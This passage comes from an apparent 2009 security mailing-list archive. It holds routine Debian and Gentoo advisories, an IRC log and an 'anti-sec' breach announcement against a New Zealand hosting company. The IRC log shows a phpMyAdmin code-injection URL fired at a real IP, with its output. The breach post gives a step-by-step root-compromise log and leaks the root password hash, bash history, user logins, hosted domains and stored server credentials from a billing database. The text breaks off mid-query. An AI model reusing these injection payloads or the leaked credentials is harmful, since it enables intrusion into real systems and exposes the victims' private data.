http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_i386.deb Size/MD5 checksum: 1382416 bcce0eb86a0e94123b73650e49893193 http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_i386.deb Size/MD5 checksum: 2330734 1819c7189c5b97029fee9004879de07b ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_ia64.deb Size/MD5 checksum: 2422520 70702e5b4d7363a9a1d4c03b0abf41c7 http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_ia64.deb Size/MD5 checksum: 2250320 904aeb68937da12928f594bba319eb6d mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_mips.deb Size/MD5 checksum: 2510252 8fee75f656fcb82329f9a1fba8d9c80f http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_mips.deb Size/MD5 checksum: 1403106 2e5454f24388aec81e74bfde59a861ed mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_mipsel.deb Size/MD5 checksum: 2408904 5794b3ff1cc68160363c5f85145e8676 http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_mipsel.deb Size/MD5 checksum: 1400836 575acb755aa91460a3dcb46d839d29d7 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_powerpc.deb Size/MD5 checksum: 1528612 9443fc222234b9c08515e3f68c0bd9db http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_powerpc.deb Size/MD5 checksum: 2499118 19bec84cb0bbbd50e6074e5376d703e6 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_s390.deb Size/MD5 checksum: 1395100 ed3894606ef6c2174cb8520aeca3d0bd http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_s390.deb Size/MD5 checksum: 2460168 d5da0fe521f64a2b2306eaca4ab250b2 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_sparc.deb Size/MD5 checksum: 2204680 2cf9f082cdfacbd93f7ea7f2ce756a56 http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_sparc.deb Size/MD5 checksum: 1370882 60c41edc23d52753fe58c8884621279c These files will probably be moved into the stable distribution on its next update. Debian GNU/Linux 4.0 alias etch - ------------------------------- Debian (oldstable) - ------------------ Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch3.dsc Size/MD5 checksum: 947 b9015c15569bb0a608729966e73eda3f http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch3.diff.gz Size/MD5 checksum: 28125 8c35b478b9731ce7f7bd7a08e22f551f http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6.orig.tar.gz Size/MD5 checksum: 1734400 a032edba07bf389b803ce817e9406c02 Architecture independent packages: http://security.debian.org/pool/updates/main/n/nagios2/nagios2-doc_2.6-2+etch3_all.deb Size/MD5 checksum: 1149448 9ed8464c5f69f3649d219df01d60dd42 http://security.debian.org/pool/updates/main/n/nagios2/nagios2-common_2.6-2+etch3_all.deb Size/MD5 checksum: 58848 9af8f3bbd8bb33bf43f5a65ba0498e48 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch3_alpha.deb Size/MD5 checksum: 1698844 8ac4a327830b76ce635df9f27b40c31f http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch3_alpha.deb Size/MD5 checksum: 1219946 74c451aba32bf1af3049fa4aa55aa7ba amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch3_amd64.deb Size/MD5 checksum: 1097060 6efd47f2ee3ee8afad49427a2f834568 http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch3_amd64.deb Size/MD5 checksum: 1686050 510a3e84ffc77baa6ce8a24a7c6b3d68 arm architecture (ARM) http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch3_arm.deb Size/MD5 checksum: 1535814 5fe56d35cc5849cf95cedeacc6e0d818 http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch3_arm.deb Size/MD5 checksum: 1023254 5ab12797ff209d89e72f4e4f5fd7dcef hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch3_hppa.deb Size/MD5 checksum: 1146854 9d15019fe7a9f12373a93bb6e1811a2b http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch3_hppa.deb Size/MD5 checksum: 1618176 5ccce2b7366ca4491dc17a7984da0a71 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch3_i386.deb Size/MD5 checksum: 1015296 0121ad8ec5839b0f86b0774245fbff54 http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch3_i386.deb Size/MD5 checksum: 1584546 8fa4ea83df2a32f2687d1f00f1f3fc21 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch3_ia64.deb Size/MD5 checksum: 1709844 1d7b16f899f2da2b688abfb971debee2 http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch3_ia64.deb Size/MD5 checksum: 1618780 29a8a56b0d195ef1269c8b2d2fd9a866 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch3_mips.deb Size/MD5 checksum: 1704724 b5af7087fe2d19b835c6815c58dae46e http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch3_mips.deb Size/MD5 checksum: 1103170 ba8afb59a09a676000b35436156923c1 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch3_mipsel.deb Size/MD5 checksum: 1102940 3e02e9d3518b2492f4cc8b778ffeb0dd http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch3_mipsel.deb Size/MD5 checksum: 1659070 6d9cad7f7e2e7b1113e4199c3371caed powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch3_powerpc.deb Size/MD5 checksum: 1087622 7115be653606065e657f644462bfa95f http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch3_powerpc.deb Size/MD5 checksum: 1665826 f1e3a852b49cb7070bffec7b20e00bb5 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch3_s390.deb Size/MD5 checksum: 1000928 5fd2eb71da07df47ea4a8ae186ee920b http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch3_s390.deb Size/MD5 checksum: 1611830 ce74a264a7337e8b4db1d906738a351c sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch3_sparc.deb Size/MD5 checksum: 987636 a421762c82f57aff30fc2bc5bccf4ab7 http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch3_sparc.deb Size/MD5 checksum: 1481982 0358d5ce2bc53cc013ccc4fcba751f56 - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkpOJ8YACgkQHYflSXNkfP9LTgCfRDvFuqJxU/KJUKFUvr36Ulp6 fBgAn0GIaSsu4ni/ifk4NeAaZ0QRyiOW =rrNK -----END PGP SIGNATURE----- From johndo.jd at gmail.com Fri Jul 3 17:26:01 2009 From: johndo.jd at gmail.com (John Doe) Date: Fri, 3 Jul 2009 18:26:01 +0200 Subject: [Full-disclosure] Iceman.Ro - 'new' botnet to come Message-ID: 18:13 -!- IceMan` [~bb at IceMan.ro] has joined #root 18:13 < pink_panther> Hello, friend 18:13 < IceMan`> uh :))))) 18:13 < pink_panther> We were just talking about you 18:13 < L> hi there 18:13 < IceMan`> eh i must close this ircd 2 18:13 < IceMan`> uf uf uf 18:13 < pink_panther> awwww 18:13 < IceMan`> brb closing the domein 18:13 < IceMan`> domain* 18:13 < pink_panther> but it's so cute how you basically took the milw0rm sploit and didn't change it 18:13 < pink_panther> so everyone could share on these hosts 18:13 < pink_panther> you're really a nice guy 18:13 < IceMan`> not really 18:13 < pink_panther> well yes really. 18:14 < IceMan`> 87.98.169.9 18:14 < IceMan`> hack it 18:14 < IceMan`> 87.98.169.9/phpmyadmin/ 18:14 < pink_panther> http://imukuppi.org/phpmyadmin/config.inc.php?p=phpinfo(); 18:14 < L> http://87.98.169.9/phpmyadmin/config.inc.php?c=id 18:14 < IceMan`> L eh 18:14 < IceMan`> not like that 18:14 < IceMan`> because 18:14 < IceMan`> i put the code there 18:15 < IceMan`> but hack it like it was fresh 18:15 * pink_panther hahahaHAHaHAhAHahaHAhahaHahaHahahahahAhahahahaha 18:15 < L> uid=33(www-data) gid=33(www-data) groups=33(www-data) 18:15 < pink_panther> you so don't get it 18:15 < IceMan`> eh nevermind 18:15 < pink_panther> this is fucking entertaining 18:15 < L> huauahua 18:15 < IceMan`> i will close the ircd`s anyway :)) 18:15 < pink_panther> you were klining me earlier 18:15 < IceMan`> and open bthe on other domeins -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090703/6b3076ab/attachment.html From a3li at gentoo.org Sat Jul 4 08:48:13 2009 From: a3li at gentoo.org (Alex Legler) Date: Sat, 04 Jul 2009 09:48:13 +0200 Subject: [Full-disclosure] [ GLSA 200907-03 ] APR Utility Library: Multiple vulnerabilities Message-ID: <1246693693.4286.1.camel@localhost> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200907-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: APR Utility Library: Multiple vulnerabilities Date: July 04, 2009 Bugs: #268643, #272260, #274193 ID: 200907-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities in the Apache Portable Runtime Utility Library might enable remote attackers to cause a Denial of Service or disclose sensitive information. Background ========== The Apache Portable Runtime Utility Library (aka apr-util) provides an interface to functionality such as XML parsing, string matching and databases connections. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-libs/apr-util < 1.3.7 >= 1.3.7 Description =========== Multiple vulnerabilities have been discovered in the APR Utility Library: * Matthew Palmer reported a heap-based buffer underflow while compiling search patterns in the apr_strmatch_precompile() function in strmatch/apr_strmatch.c (CVE-2009-0023). * kcope reported that the expat XML parser in xml/apr_xml.c does not limit the amount of XML entities expanded recursively (CVE-2009-1955). * C. Michael Pilato reported an off-by-one error in the apr_brigade_vprintf() function in buckets/apr_brigade.c (CVE-2009-1956). Impact ====== A remote attacker could exploit these vulnerabilities to cause a Denial of Service (crash or memory exhaustion) via an Apache HTTP server running mod_dav or mod_dav_svn, or using several configuration files. Additionally, a remote attacker could disclose sensitive information or cause a Denial of Service by sending a specially crafted input. NOTE: Only big-endian architectures such as PPC and HPPA are affected by the latter flaw. Workaround ========== There is no known workaround at this time. Resolution ========== All Apache Portable Runtime Utility Library users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/apr-util-1.3.7" References ========== [ 1 ] CVE-2009-0023 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0023 [ 2 ] CVE-2009-1955 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1955 [ 3 ] CVE-2009-1956 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1956 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200907-03.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 198 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090704/141bd7d8/attachment.bin From srshaxsir at hushmail.com Sat Jul 4 10:07:30 2009 From: srshaxsir at hushmail.com (srshaxsir at hushmail.com) Date: Sat, 04 Jul 2009 12:07:30 +0300 Subject: [Full-disclosure] SSANZ - Server Systems Administration NZ. Message-ID: <20090704090730.904A6B8040@smtp.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 __ .__ _____ _____/ |_|__| ______ ____ ____ \__ \ / \ __\ | ______ / ___// __ \_/ ___\ / __ \| | \ | | | /_____/ \___ \\ ___/\ \___ (____ /___| /__| |__| /____ >\___ >\___ > \/ \/ \/ \/ \/ Some of you have seen a lot of casualties lately in the webhosting scene: hosting companies being wiped and rm'd at the expense of their clients. While some of this is collateral damage, we're about to show you, ladies and gentlemen, that sometimes you aren't pwned because of who you host but what you say. Practice what you preach. - - Why SSANZ? Owned by a kid who claims he can manage, secure and audit servers, he offers a service that he clearly cannot provide, we are against that. LoganNZ : >>Logan of New Zealand. CEO of Server Systems Administration NZ. >> >> Signature: >>Server Systems Administration NZ | SSANZ >>Got Hacked? | 24/7/365 Remote Emergency Support | Specialist Server Management >>Affordable Hosting :: Resellers, Shared & Dedicated Server Systems Server Management $25 - Security & Hardening - $50 : >>Server Management - $25 Per Month >> >>- Full Management - Support, & 3rd Party Installs >>- Monitoring - Included - up to 3 ports. >>- Emergency Recovery >>Server Security - $50 >> >>- Initial Scan & Report >>- Security Hardening & Security Installs/tweaks. >>- IDS, Security Monitoring & mod_sec configured. >>- Finishing Security Scan & SSANZ Custom Scans. >> >> >>Emergency Server Recovery - $150 >> >>- Recover Hacked Server Systems >>- Recover deleted data >>- ANTI-dDOS Services >>- dDOS Investigation Security Worries? Security Audits - 50% OFF : >>Get your site/server audited to ensure your business data is >>secure before you become a statistic. >> >>In the past 6 months, e-crime activity reports have increased by >>45% due to the global economic recession. >> >>What is involved in a Full Security Audit? >> >>External Security >> >> * Scan for Shells/malicious scripts >> * Scan for vulnerable web content ( permissions, RFI's ) >> * Scans for Vulnerable Server Services >> * Vulnerable Ports >> * Testing of TCP handling - dDOS test. >> * Scan for Vulnerable PHP scripts/mods. >> * Control Panel Security Audit ( external ) >> * Multiple Unique SSANZ Custom Scans* >> >> >>Internal Security >> >> * Permissions/Ownership(s) Review >> * Apache/Webserver Security >> * User Account Security & binaries access audit >> * Local RFI Exploits located/patched. >> * System Binary Security Audit >> * Firewall/IPTABLES Audit >> * Bruteforce detection test & audit >> * Root Access Authentication Audit >> * Local PHP Functions Audit >> * Control Panel Security Audit ( Internal ) >> * Kernel Security Audit >> * Additional SSANZ Custom Scans/Audit* We at anti-sec decided to give you a _FREE_ Full Security Audit!* * `rm -rf /` is included. anti-sec:~/pwn# ./map ssanz.net IP: 66.197.143.133 ( osiris.ssanz.net ) WWW: Apache/2.2.11 SSH: SSH-2.0-OpenSSH_4.3 IP: 66.197.204.101 ( devil.ssanz.net ) WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4 SSH: SSH-2.0-OpenSSH_4.3 anti-sec:~/pwn# cd xpl/ anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.143.133 -p 22 [+] 0wn0wn - anti-sec group [+] Target: 66.197.143.133 [+] SSH Port: 22 [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>] sh-3.2# export HISTFILE=/dev/null sh-3.2# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) sh-3.2# uname -a Linux osiris.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux sh-3.2# head -n1 /etc/shadow root:$1$t4e0hufX$UH4Q5jTj93EEAODNrSaWO/:14412:0:99999:7::: sh-3.2# w 03:43:43 up 7 days, 54 min, 1 user, load average: 9.01, 9.78, 10.73 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/0 125.238.144.224 20:17 7:26m 13:18 13:18 htop sh-3.2# pwd /root sh-3.2# ls -la total 3008 drwxr-x--- 24 root root 4096 Jul 4 03:43 . drwxr-xr-x 27 root root 4096 Jun 27 02:49 .. - -rw------- 1 root root 957 Jun 13 07:24 .accesshash - -rw------- 1 root root 1012 Jun 1 10:39 anaconda-ks.cfg - -rw------- 1 root root 15460 Jul 3 23:38 .bash_history - -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout - -rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile - -rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc drwxrwxrwx 3 therockm therockm 4096 Jun 5 07:26 bwm-ng-0.6 - -rw-r--r-- 1 root root 141564 Mar 1 2007 bwm-ng- 0.6.tar.gz drwxr-xr-x 3 root root 4096 Nov 15 2006 cmm - -rw-r--r-- 1 root root 18656 Feb 28 11:32 cmm.tgz drwxr-xr-x 3 root root 4096 Nov 5 2006 cmq - -rw-r--r-- 1 root root 14507 Oct 10 2008 cmq.tgz drwxr-xr-x 4 root root 4096 Jun 1 14:33 .cpanel drwxr-xr-x 4 root root 4096 Jun 1 17:10 cpanel3-skel drwx------ 3 root root 4096 Jun 1 13:50 .cpobjcache drwxr-xr-x 10 root root 4096 Apr 13 16:17 csf - -rw-r--r-- 1 root root 430121 May 15 12:07 csf.tgz - -rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc drwx------ 2 root root 4096 Jun 1 13:54 .elinks - -rw-r--r-- 1 root root 1176672 Jul 4 03:40 error_log - -rw-r--r-- 1 root root 16 Jun 3 08:34 .forward drwx------ 3 root root 4096 Jun 1 10:39 .gconf drwx------ 2 root root 4096 Jun 1 10:39 .gconfd drwxr-xr-x 4 root root 4096 Jun 10 23:42 .gem drwx------ 2 root root 4096 Jun 1 13:55 .gnupg drwxrwxrwx 5 theweath theweath 4096 Jun 1 17:13 htop-0.8.1 - -rw-r--r-- 1 root root 414870 Sep 23 2008 htop- 0.8.1.tar.gz - -rw-r--r-- 1 root root 561 Jun 27 02:48 .htoprc - -rw-r--r-- 1 root root 8144 Jun 6 19:23 index.html - -rw-r--r-- 1 root root 4246 Jun 1 10:39 install.log.syslog drwxr-xr-x 6 500 root 4096 Sep 13 2005 iptraf-3.0.0 - -rw-r--r-- 1 root root 0 Jun 27 09:21 iptraf- 3.0.0.tar.gz - -rw-r--r-- 1 root root 0 Jun 27 09:22 iptraf- 3.0.0.tar.gz.1 - -rw-r--r-- 1 root root 0 Jun 27 09:24 iptraf- 3.0.0.tar.gz.2 - -rw-r--r-- 1 root root 575169 Jun 27 09:26 iptraf- 3.0.0.tar.gz.3 drwx------ 6 root root 4096 Jun 1 14:21 .MirrorSearch - -rw------- 1 root root 61 Jun 12 21:04 .my.cnf - -rw------- 1 root root 139 Jul 3 10:51 .mysql_history - -rwxrwxrwx 1 root root 38688 Dec 1 2008 mysqltuner.pl - -rw-r--r-- 1 root root 264 Jul 2 21:43 .pearrc drwxr-xr-x 2 root root 4096 Jun 1 17:04 public_ftp drwxr-xr-x 3 root root 4096 Jun 1 17:04 public_html - -rw------- 1 root root 1024 Jun 7 19:50 .rnd drwx------ 3 root root 4096 Jun 1 14:29 .spamassassin drwx------ 2 root root 4096 Jun 2 06:41 .ssh - -rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc drwxr-xr-x 3 root root 4096 Jun 7 21:54 tmp - -rw------- 1 root root 0 Jun 7 22:01 .trustwavereqs drw------- 2 root root 4096 Jun 3 08:18 whmrbackups drw------- 3 root root 4096 Jun 10 08:25 whmrcorebackups sh-3.2# cat .bash_history htop htop p htop tail -f /var/log/secure tail -f /var/log/secure [snip] nano highperformance.conf service httpd restart nano highperformance.conf service httpd restart nano highperformance.conf nano httpd.conf nano php.conf ls nano modsec2.conf ls [snip] nano visit4cash.net.conf cd .. [snip] netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n ps -aux|grep -i HTTP|wc -l w bwm-ng [snip] netstat -plan|grep :80|awk {.print $5.}|cut -d: -f 1|sort|uniq - c|sort -n netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq - c|sort -n netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq - c|sort -n netstat -ntu | awk .{print $5}. | cut -d: -f1 | sort | uniq -c | sort -n netstat -an | awk '{print $4}' | awk -F":" '{print $2}' | sort -n -u netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n netstat -nat |grep 202.54.1.10 | awk '{print $6}' | sort | uniq -c | sort -n netstat -atun | awk '{print $5}' | cut -d: -f1 | sed -e '/^$/d' |sort | uniq -c | sort -n [snip] /sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP /sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,FIN SYN,FIN - j DROP /sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,RST SYN,RST - j DROP [snip] service cups stop chkconfig cups off service nfslock stop chkconfig nfslock off service rpcidmapd stop chkconfig rpcidmapd off service bluetooth stop chkconfig bluetooth off service anacron stop chkconfig anacron off service avahi-daemon stop chkconfig avahi-daemon off service hidd stop chkconfig hidd off service pcscd stop chkconfig pcscd off [snip] http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal- iso screen wget http://www.remote-exploit.org/cgi- bin/fileget?version=bt4-prefinal-iso htop screen wget http://www.remote-exploit.org/cgi- bin/fileget?version=bt4-beta-iso [snip] wget http://fullhide.info/backup-6.24.2009_18-13-16_fullhide.tar.gz htop [snip] wget ftp://iptraf.seul.org/pub/iptraf/iptraf-3.0.0.tar.gz wget ftp://the.wiretapped.net/pub/security/network- monitoring/iptraf/iptraf-3.0.00.tar.gz [snip] wget http://www.logview.org/logview-install chmod +x logview-install ./logview-install rm -rf logview-install sh-3.2# grep sec /etc/userdomains affiliatesecrets.wecloak.info: wecloaki infosecawareness.info: andlyssa secproxy.info: secproxy infosecawareness.andly.ssanz.net: andlyssa greycloud.nakedinsects.com: greyclou serversecuritynz.com: forumz orac.nakedinsects.com: oracnz infernal.nakedinsects.com: infernal nakedinsects.com: ni fluffy.nakedinsects.com: fluffy quickclix.orac.nakedinsects.com: oracnz seco39.ssanz.net: secossan sh-3.2# lastlog | grep -v Never Username Port From Latest root pts/1 125.238.144.224 Fri Jul 3 20:27:03 - 0400 2009 simmobim pts/0 118.69.80.114 Fri Jun 12 00:22:04 - 0400 2009 mattss pts/1 118.90.48.0 Sun Jun 21 04:44:58 - 0400 2009 etasmtco pts/0 189.31.24.129 Sat Jun 20 10:14:51 - 0400 2009 sh-3.2# cd ~billing sh-3.2# ls -la total 301252 drwx--x--x 15 billing billing 4096 Jun 28 02:08 . drwx--x--x 737 root root 20480 Jul 4 00:37 .. lrwxrwxrwx 1 billing billing 33 Jun 2 01:58 access-logs -> /usr/local/apache/domlogs/billing - -rw------- 1 billing billing 87744924 Jun 14 12:33 backup- 6.14.2009_12-32-41_billing.tar.gz - -rw------- 1 billing billing 92931478 Jun 28 02:08 backup- 6.28.2009_02-06-29_billing.tar.gz - -rw------- 1 billing billing 84475934 Jun 3 06:33 backup- 6.3.2009_06-32-54_billing.tar.gz - -rw------- 1 billing billing 42341015 May 31 21:42 backup- billing9912.tar.gz - -rw-r--r-- 1 billing billing 24 May 27 2008 .bash_logout - -rw-r--r-- 1 billing billing 176 May 27 2008 .bash_profile - -rw-r--r-- 1 billing billing 124 May 27 2008 .bashrc - -rw------- 1 billing billing 17 May 27 2008 .contactemail drwxr-xr-x 5 billing billing 4096 May 8 02:48 .cpanel - -rw-r----- 1 billing billing 0 Apr 4 06:32 cpbackup- exclude.conf drwxr-xr-x 2 billing billing 4096 Jun 2 01:57 cpmove.psql drwxr-xr-x 3 billing billing 4096 Nov 12 2008 cpmove.psql.1240007789 drwxr-xr-x 2 billing billing 4096 Apr 16 23:24 cpmove.psql.1243922290 - -rw-r--r-- 1 billing billing 532304 Jul 4 03:45 error_log drwxr-x--- 4 billing mail 4096 Jan 19 21:39 etc drwxr-x--- 2 billing nobody 4096 May 27 2008 .htpasswds - -rw-r--r-- 1 billing billing 7 Nov 12 2008 .lang - -rw------- 1 billing billing 15 Jun 28 02:07 .lastlogin drwxrwx--- 10 billing billing 4096 Jul 2 21:43 mail drwxr-xr-x 4 billing billing 4096 Nov 12 2008 .mozilla drwxr-xr-x 3 billing billing 4096 Apr 29 2008 public_ftp drwxr-x--- 24 billing nobody 4096 Jun 28 02:55 public_html drwx------ 4 billing billing 4096 Jun 7 21:53 ssl drwxr-xr-x 7 billing billing 4096 Feb 25 17:59 tmp drwx------ 2 billing billing 4096 May 27 2008 .trash lrwxrwxrwx 1 billing billing 11 Jun 2 01:58 www -> public_html - -rw-r--r-- 1 billing billing 658 May 27 2008 .zshrc sh-3.2# cd www/ sh-3.2# ls admin banned.php configuressl.php domainchecker.php init.php logout.php postinfo.html templates viewticket.php whois.php affiliates.php billing contact.php downloads installmingchowping modules _private templates_c _vti_bin aff.php cart.php creditcard.php downloads.php knowledgebase.php networkissues.php register.php tutorials.php _vti_cnf announcements.php cgi-bin dbconnect.php htaccess.txt lang networkissuesrss.php serverstatus.php upgrade _vti_inf.html announcementsrss.php clientarea.php display.php images libs order.php status upgrade.php _vti_log announcements.xml configuration.php dl.php includes link.php passwordreminder.php submitticket.php viewemail.php _vti_pvt attachments configuration.php.new dologin.php index.php login.php pipe supporttickets.php viewinvoice.php _vti_txt sh-3.2# cat configuration.php sh-3.2# mysql Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 11021136 Server version: 5.0.81-community MySQL Community Edition (GPL) Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> use billing_billing; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; +----------------------------+ | Tables_in_billing_billing | +----------------------------+ | mod_ipmanager | | mod_ipmonitor | | tblaccounts | | tblactivitylog | | tbladdons | | tbladminlog | | tbladminperms | | tbladminroles | | tbladmins | | tbladminsecurityquestions | | tblaffiliates | | tblaffiliatesaccounts | | tblaffiliateshistory | | tblaffiliatespending | | tblaffiliateswithdrawals | | tblannouncements | | tblbannedemails | | tblbannedips | | tblbillableitems | | tblbrowserlinks | | tblcalendar | | tblcancelrequests | | tblclientgroups | | tblclients | | tblconfiguration | | tblcontacts | | tblcredit | | tblcurrencies | | tblcustomfields | | tblcustomfieldsvalues | | tbldomainpricing | | tbldomains | | tbldomainsadditionalfields | | tbldownloadcats | | tbldownloads | | tblemails | | tblemailtemplates | | tblfraud | | tblgatewaylog | | tblhosting | | tblhostingaddons | | tblhostingconfigoptions | | tblinvoiceitems | | tblinvoices | | tblknowledgebase | | tblknowledgebasecats | | tblknowledgebaselinks | | tbllinks | | tblnetworkissues | | tblnotes | | tblorders | | tblpaymentgateways | | tblpricing | | tblproductconfiggroups | | tblproductconfiglinks | | tblproductconfigoptions | | tblproductconfigoptionssub | | tblproductgroups | | tblproducts | | tblpromotions | | tblquoteitems | | tblquotes | | tblregistrars | | tblservers | | tblsslorders | | tbltax | | tblticketbreaklines | | tblticketdepartments | | tblticketescalations | | tblticketlog | | tblticketmaillog | | tblticketnotes | | tblticketpredefinedcats | | tblticketpredefinedreplies | | tblticketreplies | | tbltickets | | tblticketspamfilters | | tbltodolist | | tblupgrades | | tblwhoislog | +----------------------------+ 80 rows in set (0.00 sec) mysql> select name,ipaddress,hostname,username,password from tblservers; +--------------+----------------+------------------+----------+----- - -------------------------------------------------------------------- - -+ | name | ipaddress | hostname | username | password | +--------------+----------------+------------------+----------+----- - -------------------------------------------------------------------- - -+ | Osiris | 66.197.143.133 | Osiris.ssanz.net | ssanz | J4WILwNJpxR0KhyuPspLOT37zLzLrZ1wyqctabXg3co= | | Osiris-Radio | 66.197.143.133 | Osiris.ssanz.net | root | +V876e3z7tGn9HXEcOG1TJVPaSsGbj31MnsZ2lw52buNutqcpfBhrPVsKdDssqrh7eDF 8g== | | Devil | 66.197.204.101 | devil.ssanz.net | root | n/a/WSvQJp/++la5CREbl9QijpppzdxP0GjijQRXst2nag9E9PuTVrRO3A== | +--------------+----------------+------------------+----------+----- - -------------------------------------------------------------------- - -+ 3 rows in set (0.00 sec) mysql> select 